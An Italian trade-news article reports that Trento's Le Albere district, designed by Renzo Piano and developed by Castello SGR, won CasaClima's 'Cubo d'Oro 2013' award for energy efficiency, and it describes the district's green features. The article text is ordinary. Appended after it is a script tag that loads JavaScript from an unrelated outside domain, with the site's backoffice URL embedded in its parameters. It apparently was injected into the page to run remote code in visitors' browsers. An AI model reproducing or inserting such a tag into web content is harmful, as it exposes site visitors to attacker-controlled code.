1. Home
  2. Notizie e Mercato
  3. Il quartiere di Trento “Le Albere” si aggiudica il “Cubo d’Oro 2013” di CasaClima

Il quartiere di Trento “Le Albere” si aggiudica il “Cubo d’Oro 2013” di CasaClima

Energie rinnovabili di
Il quartiere di Trento “Le Albere” si aggiudica il “Cubo d’Oro 2013” di CasaClima
0/5
votato da 0 persone
Assegnato al quartiere trentino ideato da Renzo Piano e sviluppato da Castello SGR il prestigioso riconoscimento per i migliori edifici certificati CasaClima


“La riqualificazione di un´area industriale dismessa porta alla nascita di un quartiere moderno dall’elevata qualità architettonica e a basso consumo energetico: un passato che è diventato futuro.”  Con questa motivazione la giuria del premio “Casa Clima Awards 2013” ha assegnato al nuovo quartiere “Le Albere” di Trento, sviluppato da Castello SGR, il “Cubo d’Oro 2013”, un riconoscimento, promosso dall’Agenzia CasaClima, che premia gli edifici che coniugano in modo esemplare i criteri di efficienza energetica e sostenibilità ambientale.

La cerimonia di assegnazione si è svolta venerdì 6 settembre nella suggestiva cornice di Castel Mareccio a Bolzano.

Il “Cubo d’Oro” è andato poi ad altri quattro progetti provenienti da tutta Italia che hanno in comune l’applicazione dei criteri di efficienza energetica e di sostenibilità richiesti dalle certificazioni di qualità Casa Clima: Villa di Gioia, Bisceglie (BT); Convitto Bachmann, Tarvisio (UD); Casa Oberhuber, Bressanone (BZ); Casa  Touissant - Robiglio, Torino.

“Siamo orgogliosi di questo importante riconoscimento – ha commentato Giampiero Schiavo, Amministratore Delegato di Castello SGR – si tratta infatti della massima certificazione che tutto il quartiere è stato concepito all’insegna di efficienza, risparmio energetico e sostenibilità ambientale. Questo premio sta a dimostrare che a Trento si è concretizzato un progetto che esprime una nuova concezione del costruire e che rappresenta un esempio di ecosostenibilità a livello nazionale.”

Inaugurato lo scorso 8 luglio, il quartiere “Le Albere”, progettato da Renzo Piano, ha avuto tra le linee fondanti una particolare attenzione al tema del risparmio energetico di ciascun edificio, mirando in fase di progettazione esecutiva e di realizzazione ad alti standard in termini di coibenza e di controllo della dispersione termica. Le prestazioni degli edifici destinati a terziario e residenza, in termini di risparmio energetico e di contenimento della dispersione termica sono garantite dalla certificazione CasaClima, classe B.

Un sistema di pannelli fotovoltaici è stato installato sulle coperture degli edifici per fornire un contributo all’autonomia energetica dei piani interrati del quartiere. Una vocazione green esaltata anche dalla scelta dei materiali isolanti che permettono di innalzare le prestazioni in termini di risparmio energetico e di contenimento della dispersione termica. Inoltre, una centrale di trigenerazione fornisce energia per il sistema di riscaldamento/raffreddamento, con gestione autonoma del consumo. E’ previsto anche il parziale recupero delle acque piovane.



<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.2017981881181744" type="text/javascript"></script>